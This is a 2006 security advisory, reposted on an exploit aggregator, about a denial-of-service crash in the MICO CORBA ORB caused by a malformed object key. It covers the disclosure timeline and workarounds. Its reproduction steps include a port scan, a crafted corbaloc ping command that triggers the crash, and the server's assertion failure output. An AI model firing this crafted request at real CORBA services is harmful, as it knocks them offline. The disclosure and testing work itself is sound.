Advertisement






Mico crashes when contected with wrong IOR / DoS

CVE Category Price Severity
CWE-Other Not specified Not specified
Author Risk Exploitation Type Date
Unknown Not specified Not specified 2006-07-14
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006070061

Below is a copy:

== == == TOC == == ==

1. Affected Vendor
2. Affected Product
3. Vulnerability
4. Safety Hazard
5. Disclosure Timeline
6. Vendor Response
7. Patch / Workaround
8. Vulnerability Details

---------------------

== 1. Affected Vendor ==
    Object Security

== 2. Affected Products ==
    MICO - Mico is CORBA, Open Source ORB
    tested on Version
        2.3.12RC3
        2.3.12
        and latest from repository
    more infos: http://www.mico.org

== 3. Vulnerability ==
    MICO crashes when contacted with wrong object key (part: orb-id or
    orb-creation time)

== 4. Safety Hazard ==
    critical, potential Denial-of-Service

== 5. Disclosure Timeline ==
    2006-06-27 Problem found and analysed / tested with other versions
    2006-06-29 Vulnerability reported to vendor and MICOs
                 devel-mailing-list
    2006-07-05 2nd mail to vendor and mailing-list
    2006-07-06 Full disclosure

== 6. Vendor Response ==
    None.

== 7. Patch / Workaround ==
    No Patch avaible yet.

possible Workarounds
    a) Don't use MICO in or over public networks
    b) Protect MICO with an (IIOP) firewall

== 8. Vulnerability Details ==
    The following is for educational purposes only!

Start the orb, you'll crash # Example code
    -> http://wwwstud.informatik.uni-rostock.de/~cb098/mico_bug.tgz
        $ ./server
    scan your target...
        $ sudo nmap -sS -oM results.nmap -p 1-65535 192.168.1.10 /
            | grep unknown
        8010/tcp  open  unknown
        49576/tcp open  unknown
        51140/tcp open  unknown

One of these port could be the orb. Lets try to ping
    (object._non_exists()) the last one. For this I'm using a special
    handmade CORBA-Ping-Prog. It's also possible to use JacORBs pingo..
    My JPing is avaible at
        http://wwwstud.informatik.uni-rostock.de/~cb098/JPing.java
        $ java JPing -p corbaloc:: 192.168.1.10:8010//200/1151845678/0/_5
      orb.string_to_object             ... ok
      object exists? Exception caught; org.omg.CORBA.COMM_FAILURE:
      vmcid: SUN  minor code: 208 completed: Maybe

The line above are indicating that there was something wrong. On
    every active port, you'll get COMM_FAILURE; but on the ORB-port
    OBJECT_NOT_EXIST is expected and mandatory by OMG CORBA Spec.
     (See http://www.omg.org)

-- mico testserver crashed / output --
    A look into server terminal let us know, that there's sth. wrong.

$ ./server
    IOR:010000000e00000049444c3a48656c6c6f3a312e300000000200000000000000390
    0000001010000160000006c6f63616c686f73 742e6c6f63616c646f6d61696e00c4c71
    50000002f363836302f313135313735303432362f302f5f300000000100000024000000
    0100 000001000000010000001400000001000000010001000000000009010100000000
    00 # myior <-- everything is ok until here
    server: orb.cc:332: void CORBA::ORBInvokeRec::set_answer_invoke(CORBA::
    InvokeStatus, CORBA::Object*, CORBA:: ORBRequest*, GIOP::AddressingDisp
    osition): Assertion `_type == RequestInvoke' failed.
    Aborted

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum